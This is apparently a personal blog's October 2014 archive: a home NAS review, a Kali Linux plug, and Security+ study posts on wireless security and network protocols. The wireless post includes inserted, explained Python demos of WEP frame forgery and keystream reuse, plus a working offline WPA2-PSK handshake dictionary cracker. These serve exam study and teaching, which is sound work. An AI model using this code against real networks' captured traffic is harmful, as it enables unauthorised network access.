Monthly Archives: October 2014

Home NAS Solution

You know the drill: you are working on something big, creating a lot of useful notes, diagrams and mind maps, and then B-a-a-a-a-m. It is all gone, your hard drive failed, you lost all your work, go figure.

Or another case: again you are up to something, you start at work and create some files, and when you get home, oops, the files are on your work notebook. You are too tired to email stuff all the way around and you did not use sneakernet to carry them in your pocket.

Clearly there must be a better way to manage and protect all the data you have hamstered over the years. Sure, you can use Dropbox, Google Drive or another service, but in that case you are effectively handing all your data to these companies, and god knows what they do with it.

These and other reasons led me to purchase a NAS solution for my home. I was looking for a solution that would be feature rich, power efficient and easy to manage. First I thought I would put it together myself from spare parts and a base Linux install, but after some research I decided to go the commercial way.

I chose the Synology DiskStation DS213j and after a few months I must say it was an excellent choice. It runs the DSM 5 operating system, which is very extensible through software packages. I did not measure the power consumption myself, but according to Synology this NAS consumes 3.65 W in standby and 19.82 W under load. The management part is also well executed: you can manage the device itself via a nice web GUI and there are also useful iOS applications to easily access your content.

The DS213j has a very sleek design.

For the actual hard drives I went with two Western Digital Red 3 TB drives configured for Synology Hybrid RAID. This configuration provides 3 TB of protected storage. WD's Red drives are optimized for small NAS deployments and they have performed well so far.

WD's Reds are cool for your home NAS.

Overall, I am very glad that I moved to this solution. I am using it for backups, file sharing, file synchronization, video and audio streaming and VPN tunnel termination. I can even start a remote download through the cool iOS app, and when I get home the files are already available for streaming.


Hacker’s Swiss knife

Kali Linux, previously known as BackTrack, is a security distribution created by some very clever people at Offensive Security. It is supported on many different platforms, from classic x86 computers to tablets, smartphones and even ARM-based systems like the Raspberry Pi.

Kali contains a tremendous number of security tools for every stage of a penetration test: service fingerprinting, enumeration, password cracking, wireless attack tools, sniffing, spoofing, reporting, and the list goes on and on.

Kali contains more tools than this Swiss knife

Knowing these tools and techniques not only reinforces your knowledge about security, but also gives you the hands-on practice you need to know how to protect your environment from real threats.

The dragon, the well-known Kali Linux theme.

There is an excellent set of resources on the Offensive Security site: articles, forums, free videos and top paid courses. I once went through an online course with Mati Aharoni, a.k.a. muts, who demonstrated how real penetration testing is done. At that time it was a huge inspiration for me, and it was also the time I discovered an amazing band called Infected Mushroom and their mind-blowing song Suliman.

IP Subnetting 101 – The Mission X

Subnetting is a fundamental skill that every network "pro" should know. For everyone who wants to get better while having fun, there is a superb game from Cisco called the Subnet Game. It requires a Cisco login; if you don't have one, just take a few extra minutes, it is worth it!

In this game you are a secret agent and your mission is to subnet Area 51, so expect some alien high-tech stuff. Go and show them who is the boss.


Go agent, subnet the shit out of the aliens!

Security+ Series Part 5: Wireless Security

Wireless networks are enjoying huge success these days. They are available almost everywhere, from businesses, metro stations, bars and coffee shops to our homes. They connect millions of devices (phones, tablets, notebooks, thermostats, televisions) and the number is growing. The security of these networks is often overlooked or ignored, which exposes them to various types of attack. The motivation may range from simple free Internet access to intentional targeted attacks. Although it might not sound scary at first sight, once you gain access to a wireless network you are on the same LAN as its users and can pull off another form of attack, for example ARP spoofing or DNS spoofing.

Random Trivia: Delain playing during post creation.

Disabling SSID Broadcasting

One common misunderstanding out there is that disabling SSID broadcasting makes you more secure. It is fine to do so if you choose, but bear in mind that the network will not stay hidden from someone who intentionally scans the radio frequency environment with tools such as inSSIDer or Aircrack-ng: the SSID is still sent in the clear in probe and association frames whenever a client connects.

inSSIDer is a useful tool for RF analysis. It discovers nearby wireless networks.

MAC Filtering 

Stepping one step up the security ladder we have MAC address filtering. Fundamentally, this feature allows only MAC addresses which are defined in a database. This DB can live right on the access point or on a wireless LAN controller. This approach is not very secure and it should not be your primary tool for defense: MAC addresses are sent in the clear in every frame, so an attacker can sniff an allowed address and easily spoof it.

Changing a MAC address with MacAppStuff is easy cheese.

WEP 

Wired Equivalent Privacy is a wireless network security standard that shipped with the original IEEE 802.11 standard in 1997. Wireless networks at that time gained significant popularity and everyone wanted to have one. The main purpose of WEP was to bring data confidentiality and integrity. To achieve this, WEP uses the RC4 stream cipher and a CRC-32 checksum (the ICV). WEP uses the same static key for authentication and encryption. Over the years it was revealed that WEP is not secure at all and is susceptible to multiple forms of attack, mainly because of the short 24-bit initialization vector that is sent in the clear and inevitably repeats, and because RC4's per-packet key is simply the IV concatenated with the static key. If an attacker captures enough packets, he can recover the original key; CRC-32 is also linear, so encrypted frames can be modified without knowing the key. We will look at some attacks on WEP networks in the Offensive Security Series, which is coming soon. If you must use WEP, for example to support old bar-code scanners, terminate that network at a firewall and allow only the required minimum of services.
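To make the two WEP weaknesses above concrete, here is an added example (not code from the original post, and not a real driver) that builds WEP-style frames with RC4 and an unkeyed CRC-32, then shows that an encrypted frame can be altered without the key and that two frames sharing an IV leak each other's plaintext. The key, IV and messages are constructed for the demo.

```python
"""Toy WEP framing (RC4 + CRC-32) and two of the attacks it enables.

Added example, not code from the original post. Frame layout follows WEP
(3-byte IV in the clear, RC4 keyed with IV||key, CRC-32 ICV appended to
the data before encryption); the key, IV and messages below are made up.
"""
import struct
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA) XORed over data; the same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(data: bytes) -> bytes:
    """WEP's integrity check value is an unkeyed CRC-32 (little-endian)."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body = IV || RC4(IV || key, plaintext || ICV). Key is 40 or 104 bits."""
    if len(iv) != 3 or len(key) not in (5, 13):
        raise ValueError("WEP uses a 24-bit IV and a 5- or 13-byte key")
    return iv + rc4(iv + key, plaintext + icv(plaintext))


def wep_decrypt(key: bytes, frame: bytes):
    """Return (data, icv_ok). A real receiver drops the frame when icv_ok is False."""
    iv, body = frame[:3], frame[3:]
    pt = rc4(iv + key, body)
    data, tag = pt[:-4], pt[-4:]
    return data, tag == icv(data)


def forge_frame(frame: bytes, offset: int, xor_patch: bytes) -> bytes:
    """Attack 1, bit flipping: change the plaintext of an encrypted frame without the key.

    XORing a delta into RC4 ciphertext XORs it into the plaintext. CRC-32 is
    linear, crc(p ^ d) == crc(p) ^ crc(d) ^ crc(0...0), so the encrypted ICV
    can be patched to match and the receiver still accepts the frame.
    """
    iv, body = frame[:3], bytearray(frame[3:])
    n = len(body) - 4                      # data bytes before the 4-byte ICV
    delta = bytearray(n)
    delta[offset:offset + len(xor_patch)] = xor_patch
    icv_delta = zlib.crc32(bytes(delta)) ^ zlib.crc32(bytes(n))
    for i in range(n):
        body[i] ^= delta[i]
    for i, b in enumerate(struct.pack("<I", icv_delta)):
        body[n + i] ^= b
    return iv + bytes(body)


def recover_keystream(frame: bytes, known_plaintext: bytes) -> bytes:
    """Attack 2, keystream reuse: ciphertext XOR known plaintext gives the keystream."""
    return bytes(c ^ p for c, p in zip(frame[3:], known_plaintext))


def decrypt_with_keystream(frame: bytes, keystream: bytes) -> bytes:
    """Any other frame sent under the same IV (and key) reuses that keystream."""
    return bytes(c ^ k for c, k in zip(frame[3:], keystream))


if __name__ == "__main__":
    key = b"\x01\x02\x03\x04\x05"          # constructed 40-bit WEP key
    iv = b"\x0a\x0b\x0c"                   # 24-bit IV: only 16.7M values, repeats fast
    frame = wep_encrypt(key, iv, b"PAY 100")
    forged = forge_frame(frame, 4, bytes([ord("1") ^ ord("9")]))
    print(wep_decrypt(key, forged))        # (b'PAY 900', True): accepted as genuine
    other = wep_encrypt(key, iv, b"PAY 777")
    ks = recover_keystream(frame, b"PAY 100")
    print(decrypt_with_keystream(other, ks))  # b'PAY 777' without the key
```

The forged frame passes the ICV check because CRC-32 is not a MAC: anyone who can flip ciphertext bits can fix up the checksum. The keystream-reuse part is what makes the 24-bit IV fatal; on a busy network the same IV comes around within hours, and one known plaintext (an ARP request, say) decrypts everything else sent under it.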

WPA

Wi-Fi Protected Access was introduced in 2003 by the Wi-Fi Alliance as a quick fix for WEP's weaknesses. The idea was to use the same hardware but provide better security, implemented through a firmware upgrade. What WPA brings to the table is the Temporal Key Integrity Protocol (TKIP), which still uses RC4 but mixes a dynamic 128-bit per-packet key and extends the IV to a 48-bit sequence counter. WPA also adds a message integrity check (Michael) and uses that sequence counter to protect against tampering and replay. Unfortunately WPA is also susceptible to some forms of attack, such as packet re-injection and spoofing, but it is still a better choice than WEP.

Aircrack-ng in action, pwning your favorite password.

WPA2

Wi-Fi Protected Access 2 brings new encryption. It was introduced in 2004 and, because of the improvements, older WEP-era devices would require a hardware upgrade. It uses Counter Mode with Cipher Block Chaining Message Authentication Code Protocol, or simply CCMP, with AES.

CCMP is the encryption protocol that is part of the 802.11i standard. It offers enhanced security compared to TKIP. It uses 128-bit keys and a 48-bit packet number (the IV), which is never reused under a given key, to mitigate replay attacks.

You must know that WPA or WPA2 with pre-shared keys are still susceptible to attacks when a weak or predictable passphrase is used. The PMK is derived from the passphrase and the SSID with PBKDF2, and the four-way handshake that an attacker can capture (or force by deauthenticating a client) is enough to test candidate passphrases offline. An attacker could crack the password with a good wordlist or a brute-force attack. Aircrack-ng is one of the most popular tool sets to penetrate wireless networks.
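The offline dictionary attack described above, as an added example (not the post's code and not Aircrack-ng's): the key derivation follows IEEE 802.11i (PBKDF2-HMAC-SHA1 to the PMK, PRF-384 to the PTK, HMAC-SHA1 for the EAPOL Key MIC), while the "captured" handshake is constructed in make_handshake() with made-up MAC addresses, nonces and EAPOL-Key frame so that it runs offline.

```python
"""Offline dictionary attack against a captured WPA2-PSK 4-way handshake.

Added example, not the post's or Aircrack-ng's code. The handshake below is
constructed in make_handshake() with made-up MAC addresses, nonces and an
EAPOL-Key frame; only the key derivation (PBKDF2 -> PMK, PRF-384 -> PTK,
HMAC-SHA1 MIC) follows IEEE 802.11i.
"""
import hashlib
import hmac
from typing import Optional


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The SSID is the salt, which is why precomputed tables only work per SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11 PRF-n: HMAC-SHA1(key, label || 0x00 || data || counter), concatenated."""
    out = b""
    counter = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK for CCMP is 384 bits; its first 128 bits are the KCK that keys the handshake MIC."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 Key MIC: HMAC-SHA1 over the EAPOL-Key frame (MIC field zeroed), first 16 bytes."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def crack(handshake: dict, wordlist) -> Optional[str]:
    """Per candidate: one PBKDF2, one PRF, one HMAC, compare with the sniffed MIC.
    PBKDF2 (4096 rounds) is the only real cost, and it is fully parallel."""
    for candidate in wordlist:
        pmk = derive_pmk(candidate, handshake["ssid"])
        ptk = derive_ptk(pmk, handshake["ap_mac"], handshake["sta_mac"],
                         handshake["anonce"], handshake["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], handshake["eapol"]), handshake["mic"]):
            return candidate
    return None


def make_handshake(passphrase: str, ssid: str = "MyHomeWiFi") -> dict:
    """Constructed stand-in for a sniffed handshake (message 2: SNonce + MIC from the client).
    Everything here is made up; a real capture would come from airodump-ng or Wireshark."""
    ap_mac, sta_mac = bytes.fromhex("00115500aa01"), bytes.fromhex("00225500bb02")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    eapol = b"\x02\x03\x00\x5f\x02\x01\x0a" + b"\x00" * 88   # MIC field already zeroed
    ptk = derive_ptk(derive_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol": eapol, "mic": eapol_mic(ptk[:16], eapol)}


if __name__ == "__main__":
    captured = make_handshake("password123")
    print(crack(captured, ["letmein", "Welcome1", "password123", "qwerty"]))
```

Nothing in the loop talks to the access point, which is the whole point: once the handshake is on disk the attacker is limited only by hardware and wordlist quality, so the passphrase has to be long and random rather than merely "not in a dictionary".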

WPS

Wi-Fi Protected Setup was introduced in 2006. Its purpose was to help secure wireless networks without requiring the user to know all the moving parts underneath. You usually activate this feature physically on the wireless router itself or in the web GUI and it will help you pair a new device. Although this worked well, in 2011 a security flaw was found in the PIN method: the 8-digit PIN is verified in two halves, which reduces a brute-force attack to roughly 11,000 attempts and allows an attacker to recover the WPS PIN and, with it, the WPA passphrase. Disable WPS if you do not need it.

See the blue button with arrow signs underneath? That is used for WPS.

EAP

The Extensible Authentication Protocol is an authentication framework, not a single method. It is used in most enterprise wireless deployments. It provides a means of transporting the key material and parameters used by various EAP flavors such as PEAP, LEAP or EAP-TLS. EAP can be used with WPA or WPA2 (the "Enterprise" mode) to provide better authentication and key management.

As you can see, the limitation of WPA or WPA2 with a pre-shared key is the fact that they use a pre-shared key. It is one key for everyone. Imagine that you have a contractor in the office who works for you temporarily; you need to grant him access so he can work. Once he is finished, you do not want to change the pre-shared key every time just to keep the network secure. That is why in the enterprise we need a more advanced method of authentication, with per-user credentials and per-session keys. When EAP is carried over a LAN or WLAN it is referred to as 802.1X (EAP over LAN, or EAPOL), with the switch or access point acting as the authenticator and a RADIUS server as the authentication server.

PEAP

PEAP stands for Protected Extensible Authentication Protocol. It was developed by big industry players, Cisco, Microsoft and RSA Security, to address weaknesses of earlier EAP methods that sent the inner authentication unprotected. It is yet another way to encapsulate EAP frames: PEAP authenticates the server with a digital certificate and carries the inner authentication (usually MS-CHAPv2) inside a TLS tunnel. Each host receives unique keying material from that tunnel, which is then used with TKIP or CCMP to provide data confidentiality. This protocol was meant to replace Cisco's proprietary LEAP. The caveat: clients must actually validate the server certificate, otherwise a rogue access point with its own certificate can harvest the inner credentials.

LEAP

The Lightweight Extensible Authentication Protocol was developed by Cisco. It also uses dynamic WEP keys which change over time. However, LEAP relies on MS-CHAP, which sends the challenge/response exchange unprotected and does not offer strong protection of credentials; a captured exchange can be attacked offline with a dictionary.

EAP-TLS

One of the most popular and widely used flavors of EAP. As the name says, it uses Transport Layer Security. It requires a digital X.509 certificate on the authentication server as well as on every client, which makes it the strongest of the three but also the one with the most PKI overhead.

Captive portals

Captive portals are an excellent choice for wireless guest access. The way it works is that in your office you have an open SSID, for example CompanyX-Guest. This network has no authentication; everyone can connect. Once connected, clients are redirected to a web page with a usage policy that needs to be accepted. Often a username and password are required for tracking purposes; the guest account is created by a receptionist or by the ambassador who takes care of the guest. During guest account creation there is an option to set the duration that the account will be valid, for example 8 hours.

Starbucks uses a captive portal before letting you onto the dark net. Enjoy your coffee.

VPN (over open wireless)  

You are in the coffee shop enjoying your latte, connected to Starbucks Free Wi-Fi, and everything is hunky dory. Is it? Think about it for a minute: no authentication, no encryption, is your communication really confidential? Well, it depends :-). You could be protected by other protocols, like SSL/TLS when you visit https web sites. For applications that do not use any additional level of security, their traffic is visible to anyone on these wireless networks.

For secure corporate access this may impose a risk. Therefore it is recommended to use an IPsec or SSL VPN over these unsecured wireless networks. I use this approach all the time to secure my communication or bypass site restrictions.

Antenna Placement and Types 

Antenna placement is not only a security matter, but it does affect what the attacker can do: if he has really bad or no signal, he will be very frustrated. By selecting the right antenna for your deployment you can increase the security of the environment. Some popular antenna types include omnidirectional, directional and Yagi. By adjusting the transmit power you can also right-size the coverage so the signal does not spill beyond your walls more than necessary.

An antenna is like a water hose: it can focus the signal in the right direction.

Wireless site survey 

A wireless site survey is the first step of a proper wireless network deployment. Its role is to closely map the environment from the radio frequency point of view. It identifies what areas need to be covered and makes sure that signal levels are acceptable. Voice-over-wireless networks have stricter requirements. Wireless signals are susceptible to many forms of interference; for example, elevators or microwave ovens may pose a problem. The output of the survey will include heat maps, recommended access point models, their radio power settings and antenna types.

Cisco Wireless Control System can help you perform a predictive site survey.

And with that last piece of information this post has come to its very end. I hope you learned something new while having fun, because that is the whole point. The information summarized here can help you pass the Security+ exam, but the real value is to use these skills in the real world.

In the next part we will look at Compliance and Operational Security. Until then, take care and spread the word.

Security+ Series Part 4: Protocols and Ports

Welcome back to part 4 of the Security+ series. As promised, in this part we are going to look at the protocols and ports our apps use to communicate across the network. Without any further trash talk, let's get started.

IPSec

I mentioned IPsec when we described Virtual Private Networks. Generally it is not a single protocol, rather a protocol family. IPsec's job is to provide authentication, confidentiality, integrity and anti-replay protection for traffic that is on the move from one point to another.

To achieve authentication, several methods can be used, from simple pre-shared keys to RSA signatures with digital certificates.

Data confidentiality is definitely a high priority. IPsec can utilize industry-standard ciphers such as DES, 3DES or AES. The Advanced Encryption Standard is the most recent and is the recommended one of the three (DES is broken and 3DES is slow and being phased out). The way it works is that IPsec wraps your data into an Encapsulating Security Payload (ESP) and encrypts everything inside, so a man in the middle would have a hard time putting the original message together.

Message integrity checks that no one tampered with your payload in transit. For this purpose, hashing algorithms are used. They perform a one-way mathematical function on data and spit out a unique string of characters, the hash. The receiving party runs the same algorithm against the data and compares the hashes. If they match, the data did not change. Because an attacker could simply recompute a plain hash after modifying the data, IPsec keys the hash as an HMAC, so only someone holding the key can produce a valid one. The most popular hashing standards are MD5 and SHA; prefer SHA-2 for new deployments, since MD5 is deprecated.

Frenzy, one of the Decepticons, steals data from Air Force One and sends it to Megatron over an IPsec tunnel. The feds have no clue what they are cooking out there.

SNMP

Simple Network Management Protocol, also known as Security is Not My Problem, is used for network device management. It uses a poll (GET/SET) and push (trap) model. Every value in a device is stored in the Management Information Base (MIB). These MIBs have a tree structure. A value can be anything from CPU utilization or the RX/TX rate on an interface to a password. These values are protected by read-only or read-write community strings. SNMP is used by management solutions such as Cacti, Cisco's Prime Infrastructure and many others.

These guys get their favorite monitoring sitcom via SNMP.

The bad thing about SNMP version 1 and version 2c is that they do not encrypt any communication between the server and the SNMP agent (the device); the community string is sent in plain text. If someone plays the man-in-the-middle game, or simply sniffs the wire, they can easily get the strings, and that is game over, my friends. Keep in mind that the defaults "public" and "private" are the first thing a scanner tries.

It is recommended to use version 3, which adds more robust authentication mechanisms as well as encryption and message integrity (use the authPriv security level). Add an access control list on top of that and you are on the right track. SNMP uses UDP port 161 for GET/SET operations and UDP port 162 for traps.

There are more options for managing security devices. An example is Security Device Event Exchange (SDEE). SDEE runs over HTTPS, TCP port 443.

snmpwalk pulling stuff out of a box.

Telnet

Telnet is a legacy protocol, but still used on a lot of networks for remote device administration, or for watching cool movies. It dates back to 1969. It is lightweight and it does not provide any confidentiality: credentials and the whole session cross the wire in clear text. It is not recommended to use Telnet anymore; SSH is the better option. Telnet uses TCP port 23.

Star Wars Episode IV, ASCII edition. This is how the new Episode VII will be shot.

SSH

Secure Shell is the most widely used remote access protocol in the wild. It brings encryption to the table and is used for remote device management. An engineer would use it to connect to a remote router, or a scripting tool can use it to perform repeatable tasks on the box. Popular SSH clients include PuTTY and SecureCRT. SSH uses TCP port 22.

PuTTY is simple, very customizable and free.

RDP

Remote Desktop Protocol is often used for remote graphical administration of Windows-based systems. It was developed by Microsoft and provides data confidentiality and server authentication using TLS from version 5.2 onward. The server listens on TCP port 3389.

Connecting to an NSA surveillance server via RDP.

I am connecting to a remote server in the NSA domain.

DNS

Without DNS there is no Internet, and without the Internet there is no DNS. The Domain Name System plays a huge role. It translates human-readable names into IP addresses. For example, when you hit google.com, you are really connecting to one of many addresses that the service is running on. DNS can also be used for load sharing.

There are two types of DNS traffic out there: client-server queries, which use UDP port 53, and server-to-server traffic such as zone transfers, which use TCP port 53 (TCP 53 is also used for any response too large for UDP). It is important to keep DNS secure and available; many other things depend on it. Restrict zone transfers to your own secondary servers, otherwise anyone can dump your whole zone.

DNS packets displayed in the popular traffic capture tool Wireshark.

SSL

Secure Sockets Layer is a protocol used for encrypting connections over the Internet. For example, it is used when you communicate with your bank or social network. You can see the presence of this layer in your browser, often noted by a lock or the https prefix in the URL. SSL negotiates a secure connection between two parties: client and server agree on what kind of encryption, hashing and authentication they will use. This security model is tightly related to Public Key Infrastructure (PKI). We will touch on this more in later parts. Besides HTTPS on TCP port 443, other protocols can take advantage of SSL services.


The bank uses a digital certificate to prove its identity and build a secure connection.

TLS

Transport Layer Security is also a cryptographic protocol, like SSL. It is the open-standard successor, created by the IETF. It operates very similarly to SSL, and you may see these terms used interchangeably. Client and server negotiate which protocol version they are going to use, SSL or TLS, and an attacker in the middle may try to force the weakest one, so servers should have SSL 2.0 and 3.0 disabled and offer only TLS.

Bank's digital certificate details.

Bank’s secure connection details.

TCP/IP

The famous TCP/IP started it all. The term refers to the protocol stack, naming the two most used protocols, which work together. The Transmission Control Protocol takes care of reliable packet delivery, sequencing, flow control and session multiplexing. The Internet Protocol, on the other hand, handles logical addressing and routing.

TCP/IP are like the characters in Army of Two. They work with each other.

IPv4

Internet Protocol version 4 is in charge of logical addressing. The most common analogy for this protocol is your mailing address. For someone to send you a letter, they need to know your address. They write this destination address on the envelope along with the source address, in case you want to reply to the letter. IP does the same, except it uses numeric 32-bit values.

For us humans it would be hard to remember an address like this:

11001100100001000010100010011011

Therefore we tend to divide this number into octets, groups of 8 bits, like this:

11001100.10000100.00101000.10011011

and then convert each group of 8 bits to decimal. This gives us the IP address:

204.132.40.155

IP addresses are then divided into a network and a host portion by the subnet mask. Routers work with the network portion to route a packet the right way, the same way mail services route letters. Besides logical addressing, there are some extra features in the IPv4 header, like a header checksum and options.
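The octet conversion and the network/host split described above, as an added example (not from the original post), done with plain bit arithmetic rather than a library so every step stays visible. The addresses are the post's own; the /24 prefix is assumed for the walk-through.

```python
"""Octet anatomy of an IPv4 address and the network/host split, done with bit
arithmetic rather than the ipaddress module so every step in the text is visible.
Added example, not from the original post; the addresses are the post's own."""


def dotted_to_int(addr: str) -> int:
    """'204.132.40.155' -> 32-bit integer, one octet (8 bits) at a time."""
    octets = addr.split(".")
    if len(octets) != 4:
        raise ValueError(f"not an IPv4 address: {addr!r}")
    value = 0
    for octet in octets:
        n = int(octet)
        if not 0 <= n <= 255:
            raise ValueError(f"octet out of range in {addr!r}")
        value = (value << 8) | n
    return value


def int_to_dotted(value: int) -> str:
    """Reverse of dotted_to_int: peel off 8 bits at a time, most significant first."""
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def to_binary(addr: str) -> str:
    """The dotted-binary form the post shows, e.g. 11001100.10000100.00101000.10011011."""
    value = dotted_to_int(addr)
    return ".".join(format((value >> shift) & 0xFF, "08b") for shift in (24, 16, 8, 0))


def prefix_to_mask(prefix: int) -> int:
    """/24 -> 0xFFFFFF00: the top `prefix` bits are the network portion."""
    if not 0 <= prefix <= 32:
        raise ValueError("prefix must be 0..32")
    return ((1 << prefix) - 1) << (32 - prefix)


def analyze(cidr: str) -> dict:
    """Split an address in CIDR notation into its network and host portions."""
    addr, prefix_text = cidr.split("/")
    prefix = int(prefix_text)
    value = dotted_to_int(addr)
    mask = prefix_to_mask(prefix)
    network = value & mask                       # AND with the mask keeps the network bits
    broadcast = network | (~mask & 0xFFFFFFFF)   # all host bits set
    size = 1 << (32 - prefix)
    # /31 (RFC 3021 point-to-point) and /32 have no separate network/broadcast addresses.
    usable = size - 2 if prefix <= 30 else size
    return {
        "network": int_to_dotted(network),
        "mask": int_to_dotted(mask),
        "broadcast": int_to_dotted(broadcast),
        "host_bits": 32 - prefix,
        "host_part": value & ~mask & 0xFFFFFFFF,
        "first_host": int_to_dotted(network + 1 if prefix <= 30 else network),
        "last_host": int_to_dotted(broadcast - 1 if prefix <= 30 else broadcast),
        "usable_hosts": usable,
    }


if __name__ == "__main__":
    print(to_binary("204.132.40.155"))
    for key, val in analyze("204.132.40.155/24").items():
        print(f"{key:>13}: {val}")
```

Running it prints the binary form from the post and, for 204.132.40.155/24, a network of 204.132.40.0, a broadcast of 204.132.40.255 and 254 usable hosts; the same functions handle any prefix, including the /31 and /32 edge cases that trip up hand calculations.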

An IP packet is like a letter. It has its source and destination address.

IPv6

The next-generation Internet Protocol brings an extended address space and more efficient header usage. The fixed header is 40 bytes, twice as big as the minimum IPv4 header. It provides a 128-bit address space, which is a huge extension: 2^128 = 340,282,366,920,938,463,463,374,607,431,768,211,456 addresses.

The header itself was rewritten to omit some fields, like the fragmentation fields and the header checksum, and to add fields called Flow Label and Next Header. The header is much more modular now: options live in chained extension headers.

IPv4 vs. IPv6 Header

FTP

File Transfer Protocol is one of the oldest protocols out there; the original specification dates back to 1971. The protocol name speaks for itself. It uses TCP port 21 for the control channel and TCP port 20 for data in active mode (passive mode uses a server-chosen high port instead), and it does not provide any confidentiality: usernames and passwords travel in clear text.

FTPS

Remember when I told you about SSL/TLS and that their services can be used by other protocols? That is exactly what is happening here. File Transfer Protocol over SSL uses them to secure data in transit. This is different from SSH File Transfer Protocol. It is not used very often in the wild; there are better ways.

SFTP

SSH File Transfer Protocol is a subsystem of the SSH protocol. It uses the same mechanisms for authentication and encryption but is used for file transfer, whereas classic SSH is used for remote administration via the CLI. It uses TCP port 22.

TFTP

Trivial File Transfer Protocol is the last flavor we will mention. As the name says, it is very lightweight and simple. It offers no authentication or encryption and only minimal lock-step reliability. It runs over UDP port 69. It is often used in IP telephony, where phones use it to download firmware and configuration. Most embedded systems also support this protocol for the reasons mentioned earlier. Anything served over TFTP (configs, firmware) is readable by anyone on the path, so never put credentials there.

TFTP is lightweight like these shoes

HTTP

Our good old buddy Hypertext Transfer Protocol has been around since 1991. It is an application-layer protocol used to request various types of resources, from simple text-based HTML pages to multimedia. It defines message types, response codes, basic authentication, caching and more. By default it uses TCP port 80.

HTTPS

Another case of using SSL/TLS secure services. Original HTTP is plain-text communication and therefore needs another protocol to secure it. As mentioned, HTTPS rides on TCP port 443.

HTTPS uses SSL/TLS to secure your data

SCP

Secure Copy Protocol uses the same mechanisms for authentication, encryption and hashing that SSH uses. It provides just another way to transfer files securely, and also runs over TCP port 22.

ICMP

Internet Control Message Protocol was invented to provide control services for IP. Some of the most used tools in the world are in fact using ICMP: the famous ping command and also some implementations of traceroute.

ICMP is often used in monitoring systems to determine system availability. The management station sends an ICMP Echo Request at regular intervals and expects an ICMP Echo Reply. Firewalls often do not permit this type of traffic because of the risk of network reconnaissance, mapping what is alive on the net. Blocking ICMP wholesale has side effects though; path MTU discovery relies on it.

Valve Portal’s turret uses ICMP to check if you are alive.

SMTP

Simple Mail Transfer Protocol is used to carry email messages from one email server to another. SMTP uses TCP port 25. There is also a flavor of SMTP that uses TLS, called SMTPS, which uses TCP port 465; mail clients submitting mail typically use port 587 with STARTTLS.

POP3

Post Office Protocol is also used in email communication; the first version was introduced in 1984. It is used by email clients to retrieve messages from the server. It supports download and delete actions for simple mail manipulation. Usually a client would connect, download the messages and delete them from the server. The POP service listens on TCP port 110. This protocol can provide confidentiality using TLS; in that case it runs on TCP port 995.

Good luck reading the mail.

IMAP

Internet Message Access Protocol has a similar function to POP but brings additional features. An IMAP client can send complex queries, for example retrieve just the email header information. It supports online and offline modes of operation. Plain IMAP runs on TCP port 143 and the flavor that uses TLS for security runs on TCP port 993 (IMAPS).

Microsoft Outlook is a popular POP3/IMAP client.

iSCSI

SCSI stands for Small Computer System Interface. It is used to interact with storage devices such as hard drives. It can be used over a network, hence the name (Internet) SCSI, to interact with a remote storage device at block level. The iSCSI client is referred to as the initiator and the remote storage is called the target; the target listens on TCP port 3260. It is commonly used in small-scale Storage Area Network deployments. Storage servers can offer higher reliability and data protection through technologies such as RAID. These networks have higher demands on bandwidth and reliability than other types of traffic, and since plain iSCSI is unencrypted, keep it on an isolated storage VLAN and use CHAP authentication between initiator and target.

The client's disks appear as if they were directly connected, but in fact they are located on the iSCSI target (server).

Fibre Channel

Fibre Channel is another technology used to access remote storage at block level. FC uses dedicated Host Bus Adapters on the server side that connect to Fibre Channel switches, which also connect storage appliances containing various disk types: Solid State Drives, SAS drives, SATA drives and tape libraries. Fibre Channel technology is pretty costly compared to iSCSI.

EMC storage array.

FCoE

Historically, data and storage ran over two distinct physical networks. The reason was that storage traffic has different transport requirements and usually requires high-speed links of 4, 8 or 16 Gbps. As 10 Gbps Ethernet evolved and matured, a new flavor of FC was introduced. Fibre Channel over Ethernet can use the same infrastructure for data and storage traffic. FC frames are encapsulated into Ethernet frames and receive special lossless treatment (priority flow control) from the transport fabric.

This can reduce CAPEX and OPEX since you no longer need separate data and storage connections to servers and separate data and storage switches.

NetBIOS

Network Basic Input/Output System is a legacy protocol used in Windows-based networks. It uses several services: name services run on UDP 137, datagram services on UDP 138 and session services on TCP 139. These ports should never be reachable from the Internet.


And that, my friends, is the end of this post. I did not think at the beginning that it would be this long; if you made it to the end, you have my praise. Stay tuned for the next post in the series, which will cover Wireless Security.

Hellbound Hackers

A few years back, when I was a goddamn kid, a friend of mine told me about the site hellboundhackers.org. This site is so much fun. Besides a large article base, it has numerous security challenges in different areas: basic web hacking, JavaScript hacking, encryption, timed, real world and steganography are on the list.

Going through the challenges teaches you about the different vulnerabilities that are out there, and how to fix them in the application patching challenges.

So go now, learn and exploit them already!

“Behind this mask there is more than just flesh. Beneath this mask there is an idea… and ideas are bulletproof.”

